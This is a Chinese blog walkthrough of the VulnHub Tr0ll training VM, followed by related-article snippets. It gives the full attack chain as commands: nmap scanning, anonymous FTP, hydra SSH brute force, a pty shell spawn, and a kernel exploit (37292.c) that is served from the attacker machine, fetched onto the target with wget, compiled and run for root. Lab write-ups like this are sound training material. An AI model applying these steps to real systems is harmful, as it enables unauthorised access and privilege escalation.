【Vulnhub靶场】Tr0ll

最新推荐文章于 2025-04-21 14:11:02 发布
最新推荐文章于 2025-04-21 14:11:02 发布
阅读量683 收藏 9
点赞数 16
分类专栏: VulnHub渗透测试靶场 文章标签: Vulnhub靶场 渗透测试 漏洞 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73442302/article/details/143567464
版权

Tr0ll靶场下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar

目标

拿下靶机root权限

本机IP:192.168.118.128

目标IP:192.168.118.0/24

信息收集

nmap探测存活主机,扫端口,扫服务

nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.147

nmap -sV -A 192.168.118.147

第一步探测出靶机IP为192.168.118.147

探测出三个端口:21、22、80

发现21端口的ftp服务可以进行匿名登录

先访问web看一下,好吧,挺可爱的

匿名登录FTP

找到一个pcap文件,保存下来

使用 wireshark 查看

wireshark lol.pcap

分析pcap文件,追踪TCP流,在里面的得到一个提示,简单测试一下得到 sup3rs3cr3tdirlol 应该是一个后台目录 

访问得到的目录:http://192.168.118.147/sup3rs3cr3tdirlol

里面有一个名为 roflmao 的文件,下载下来

查看文件类型,加权限,运行起来(这里有个问题是靶机下载的东西怎么能直接运行呢,不怕有危险吗??)

file roflmao
chmod 777 roflmao
./roflmao

运行结果提示我们应该找到一个新地址

访问目录:http://192.168.118.147/0x0856BF

里面有两个文件夹,打开第一个里面有一堆账号

第二个文件名就提示我们里面肯定存放有密码了,打开最终里面的内容是Good_job_:),但是后面测试发现是错误的,但密码肯定就是在这个文件里面的啊,最后发现存放这个密码的文档名居然是密码!!!密码为 Pass.txt

将前面发现的账户名整理下来,存为 user.txt

前面扫描出靶机是有开放22端口的ssh,使用九头蛇进行爆破

hydra -L user.txt -p 'Pass.txt' ssh://192.168.118.147

得到账号密码(overflow :Pass.txt)

使用ssh登录,然后上传脚本实现交互式shell

ssh overflow@192.168.118.147

python -c 'import pty;pty.spawn("/bin/bash")'

登录成功以后发现为普通账户,下一步肯定就是提权了

使用 uname -a 查询到版本信息为linux 3.13.0 ubuntu

内核漏洞提权

就第一个脚本拷贝到桌面

locate linux/local/37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop

将脚本上传到靶机的 /tmp 目录下,编译运行,提权成功

python -m http.server 80

wget 192.168.118.128:80/37292.c

gcc -o exp 37292.c

./exp

VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 738
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第一部分 信息收集 第一步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
CTF之Tr0ll1 靶机渗透(FTP匿名登录 SSH爆破)
afei001
12-06 772
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.对端口进行全扫描 4.FTP匿名登录,探测信息 5.尝试爆破SSH 6.内核漏洞提权,拿下flag 总结 练习环境 攻击机:kali 靶机:Tr0ll: 1 下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar 1.发现靶机,端口扫描 root@kali:~# nmap -sV -O 100.100.100.14 Starting Nma...
渗透测试靶机---Tr0ll
久恙502的博客
10-28 558
渗透测试,打靶经历记录,大佬多多指点,谢谢!
vulhub靶场文件下载说明
最新发布
gitblog_06738的博客
04-21 336
vulhub靶场文件下载说明 【下载地址】vulhub靶场文件下载说明 该项目提供了一份vulhub靶场文件的下载资源,帮助用户快速搭建安全测试环境。vulhub是一个自动化部署测试环境的工具,适合安全研究人员和爱好者轻松测试各种已知问题。文件包含压缩包,下载后可在本地高效使用。安装步骤简单,支持在kali系统中通过Do...
VulnHubTr0ll靶机训练
ccssggoo的博客
03-09 3163
靶机下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar​​​​​​ 渗透机kali2022 靶机:Tr0ll 安装好靶机后用netdiscover -r 192.168.10.0/24发现ip,在用nmap工具扫描发现的ip找到搭建好的靶机ip
TR0ll
wswr的博客
05-06 737
进入10.10.10.151/0x0856BF ,打开文件夹,会发现一个是账号一个是密码,而密码文件夹打开是一个good job,然后用把账号文件夹的内容复制作为账号字典,hydra去爆破会发现密码不是这个good job然后用密码的文件夹名试一下,会发现可以。这里为什么会去用hydra爆破ssh的原因是这个靶场就给了3个端口,80没找到有用,21是可以匿名登入,那肯定是爆破22的ssh,正常看到ssh肯定有的思路之一就是爆破,其他的是看openssh的版本号有没有存在的漏洞,这里是直接爆破。
vulnhub靶场- Tr0ll靶场
zzzzzzkeai的博客
11-27 796
vulnhub靶场--Tr0ll:1靶场
tr0ll靶机渗透
weixin_43070384的博客
06-19 848
. 发现目标靶机IP地址,然后可以得出目标网站的IP地址,所以通过IP地址登陆网站。 nmap -sP 192.168.xxx.0/24 2. 得到目标靶机的ip地址后,用浏览器登陆目标IP,发现是一张图片! 3. 然后我们遍历目录,查找敏感路径。 4. 通过遇见扫描出地址登陆 robots.txt 5.登陆192.168.111.131/secret/index.html(本能应激登陆) 6.扫服务发现开启了ftp服务 7.已知ftp服务打开了,所以干他娘的,二营长把我的意大利炮抬出来...
vulnhub靶场TR0LL
02-19
### VulnHub TR0LL 靶场 攻略 介绍 下载 #### TR0LL系列概述 TR0LL 是一系列发布于 VulnHub 的虚拟机镜像,旨在提供给安全研究人员和技术爱好者用于练习渗透测试技巧。该系列包括多个版本,每个版本都设计有不同的...
Vulnhub Tr0ll2靶机实战
kiritio1024513的博客
01-16 978
一次有用的靶机实战
VulnHub靶场系列:Flick
快吃小蛋糕吧的博客
10-03 1378
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来。 环境部署: 下载靶场并导入到VMware中: https://download.vulnhub.com/flick/flick.tar.gz 实战: 首先使用工具扫描整个网段得到靶机IP: fping -g 192.168.142.0/24 得到靶机IP后使用Nmap工具检测服务器开放端口: nmap -sV -p1-65535 192.168.142.35
vulhub靶场.zip
10-14
vulhub靶场
Vulnhub靶机的下载和使用
laoyanCZ的博客
11-26 1601
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
【学渗透靶机——Tr0ll
jieli0901227的博客
06-04 260
编辑脚本,执行系统命令让overflow 用户以root身份执行所有权限,脚本执行后再次登录overflow 用户就能以root身份执行bash。下载查看roflmao 文件,0x0856BF这个地址有可能是内存地址,也有可能是url 路径地址。Pass.txt文件里面的密码我们已经试过了,既然文件夹中包含面,但是这个文件名还没试过。发现了两个文件,打开第二个文件查看,发现了Pass.txt文件,查看看看。操作过程会中断,,是不是有计划任务存在执行脚本呢,查看计划任务无权限,匿名用户登录,发现有文件。
Tr0ll靶机练习
SYJ_361的博客
03-27 3014
本文是对Tr0ll靶机的练习,利用ftp漏洞进行远程登录,利用python生成反弹shell的脚本,并通过远程进行下载,并对靶机进行提权,最终获得root权限
Tr0ll
学习!冲冲冲!
06-12 323
Tr0ll
Vulhub 靶场下载使用
Gjqhs的博客
03-09 492
Vulhub 靶场安装_Gjqhs的博客-优快云博客 官网查找是否有此漏洞镜像 点击搜索结果即可查看对应信息以及复现利用方法 拉取方法 修改网址前面加git,后面操作跟上面官网步骤走即可 ...
VulnHub之DC靶场下载与DC靶场全系列渗透实战详细过程
金 帛的博客
08-09 1157
DC靶场直通车
攻破 VulnHub-Tr0ll 靶机
Bulestardemon的博客
12-29 689
攻破 VulnHub-Tr0ll 靶机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值